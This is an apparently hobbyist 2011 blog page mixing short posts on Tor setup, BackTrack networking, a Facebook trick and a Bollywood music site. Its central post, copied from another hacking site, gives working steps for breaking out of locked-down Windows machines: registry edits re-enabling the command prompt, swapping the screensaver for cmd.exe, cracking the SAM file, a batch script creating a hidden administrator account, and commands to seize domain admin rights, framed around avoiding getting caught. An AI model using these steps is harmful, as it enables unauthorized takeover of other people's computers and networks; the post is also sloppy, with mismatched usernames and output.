Wednesday, December 28, 2011

Browse anonymously with Tor

Anonymity is cool and necessary when you want to hide your identity on the web, especially for hackers.
Well, this is a simple tool for hackers to make Firefox and Ubuntu Anonymous.

To install Tor just download it via apt-get on ubuntu (debian)-

just type-

sudo apt-get install tor

When installed also install "vidalia". This tool manages tor and is GUI.

sudo apt-get install vidalia

Now open vidalia by typing

sudo vidalia

Turn tor on, now you can use this to anonymous connection.

But still this won't make the browsers anonymous for this download a small plugin for firefox.

Just click here to install tor in Firefox (tor not available for other browsers)-



https://www.torproject.org/dist/torbutton/torbutton-current.xpi

or go here - https://www.torproject.org/torbutton/index.html.en

Then after the plugin you will see a "red" icon next to address bar. Just click it and "toggle" mode.

The icon will become green, now again check your IP in the browser.

Hack it Easy :-)

Start networking in BackTrack 4

So you have installed BackTrack 4 and are ready for hacking, but you can't connect to the internet.
Well, Backtrack won't start the networking automatically to maintain stealth boot.
So, to initiate networking and enabling internet enter the following command:


root@bt:~# /etc/init.d/networking start


This command will start networking/internet in backtrack.

have fun :-)

Wednesday, November 30, 2011

Desi Boyz earns Rs 25 crores in opening weekend | DailyJag http://ping.fm/aFWSE

Tuesday, November 22, 2011

Posting empty facebook status | Facebook Trick

This is a simple trick which allows you to post empty facebook statuses or comments ( yes, they are not allowed by deafult).


Steps-





Just type “@[0:0: ]” or “alt+0173″ and you are done.


You can google for many more facebook short code or symbols.

A simple facebook trick.

Diffrent ways to Access Command Prompt

This article is about hacking networks. Since any longer than five minutes, you risk getting caught, this is *hopefully* going to teach you how to get root in five minutes or less. So, lets get it started.


To those of you that think by getting root, you own everything, sorry to disapoint you. But, by getting root, you only own the comp your on. There is however, a way to get domain root, which I'll discuss later.

So first of all , try and check your access to DOS. For doing so :
"start>all programs>accessories>cmd" or "start>run> type in 'cmd'"

If it doesnt works, go and make a file named "whatever.txt" Right click, and open it in notepad. Type "cmd" in it and save, if you are able to see some black screen fr a second, yes, you can get it. Now change the content in file, i.e

replace "cmd" with following:

@echo off
echo hello
pause

If you see "HACKED" on the screen, then yes you are more closer. Finally now change the content to following :
REGEDIT4
[HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesWinOldApp]
"Disabled"=dword:0
[HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem]
"DisableRegistryTools"=dword:0


This changes the registry value that blocks dos. So, type "cmd" in the .bat and see if it works. If that also didn't work, theres still other ways.

Now, type in your commands and click "file>save as>" for the type, put "text document, and save as "anything.bat".
If that wasn't the reason, I hope you have access to the C drive.
If you do, go here "C:\Windows\system32\" and create a new folder.
Now, find "cmd.exe" and "scrnsave.scr" and copy them to the new folder.
Goto the folder and rename "scrnsave.scr" to "scrnsaveold.scr", and "cmd.exe" to "scrnsave.scr" And replace it with the real one in system32. Now the next time your screen saver appears, it will be full access dos. So, if you can, on the desktop, right click and select properties. Change the time to one minute. On windows xp, you may have to make sure the screensaver is "scrnsave".

Even if it doesnt works, you can go for control panel. yes this one is not gauranteed, but ya at least it may be try at least.

Just create a new folder and rename it to following(obviously only the {} part)


Control panel: {305CA226-D286-468e-B848-2B2E8E697B74}
Printers: {2227A280-3AEA-1069-A2DE-08002B30309D}
Taskbar and startmenu: {0DF44EAA-FF21-4412-828E-260A8728E7F1}
Microsoft FTP folder {63da6ec0-2e98-11cf-8d82-444553540000}
Temporary Internet files {7BD29E00-76C1-11CF-9DD0-00A0C9034933}
ActiveX Cache folder {88C6C381-2E85-11D0-94DE-444553540000
Subscriptions folder {F5175861-2688-11d0-9C5E-00AA00A45957}
Dial-up networking: {992CFFA0-F557-101A-88EC-00DD010CCC48}
Scheduled tasks: {D6277990-4C6A-11CF-8D87-00AA0060F5BF}
Folder options: {6DFD7C5C-2451-11d3-A299-00C04F8EF6AF}
Dial-Up Networking: {992CFFA0-F557-101A-88EC-00DD010CCC48}
Scheduled tasks: {D6277990-4C6A-11CF-8D87-00AA0060F5BF}
History {FF393560-C2A7-11CF-BFF4-444553540000}

Another way to get dos, is to create a prog. Uber0n has created such a program. You can find it at http://www.freewebs.com/uber0n/ You'll need a c++ compiler.

If so far, nothing has worked. You need to crack the sam file. Pretty sure Cain & Abel has this option.

If you did get dos, it's time to create yourself an admin acct. Type this.

@echo off
net user hackplanet hackplanet /add
net localgroup administrators hackplanet /add
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v hackplanet/t REG_DWORD /d 0


First Line just hides the file address and stuff.
Second Line Creates the user "hackplanet" with the password of "hackplanet".
Third Line adds "upgoingstar" to the administrators group.
Fourth Line makes the acct "upgoingstar" a hidden acct.
If you see "The command completed successfully." or something similiar, congragulations. You now have root. If it didn't work, it means you have limited access dos, use the screensaver thing.

If you want domain root, you can either find the domain admin's username and type


@echo off
net user [username] [newpassword]

That will change the pass.
Or, if you can get on his/her comp, type this in dos.

net group "Domain Admins" [username] /add

This will add an acct to the domain admins.


Moreover, if you don't have access to the C drive, or any other particular drive, there are a few ways to view it's contents. You just need to be able to install programs. Google has a program called "Google Desktop" which indexes the computer and makes it searchable.
Or, you can download a web browser such as Opera. In the url bar type this "file://" you should now see a list of drives.


Seems funny? Weel, actually it is. :)

Source- http://hackplanet.in

Tuesday, August 30, 2011

Adroit Business Solutions: Mobile Application Development Company,Web application development,Testing services,offshore software development | Adroit Business Solutions http://adroit-inc.com/#

Monday, August 8, 2011

Listen to latest bollywood songs for free.

While browsing I just landed on an amazing site , ganeshane.com. This site lets its users listen to latest bollywood songs for free and too for free at no charge at all.

Ganeshane has a huge database of the latest songs and great oldies as well. The interface is nicely designed and lets users browse the site while listening to songs.

The best thing we like about the site is that it has exclusive applications on all three leading smart phones - iPhone, Android and blackberry. So you can create playlists online and then listen them on your phone.

The android and iPhone application for ganeshane are paid. Do tell us if you like the app.

The service has a great potential as they deliver the latest songs and have well managed mobile applications which could definitely cover a huge consumer market.



Share

Twitter Delicious Facebook Digg Stumbleupon Favorites More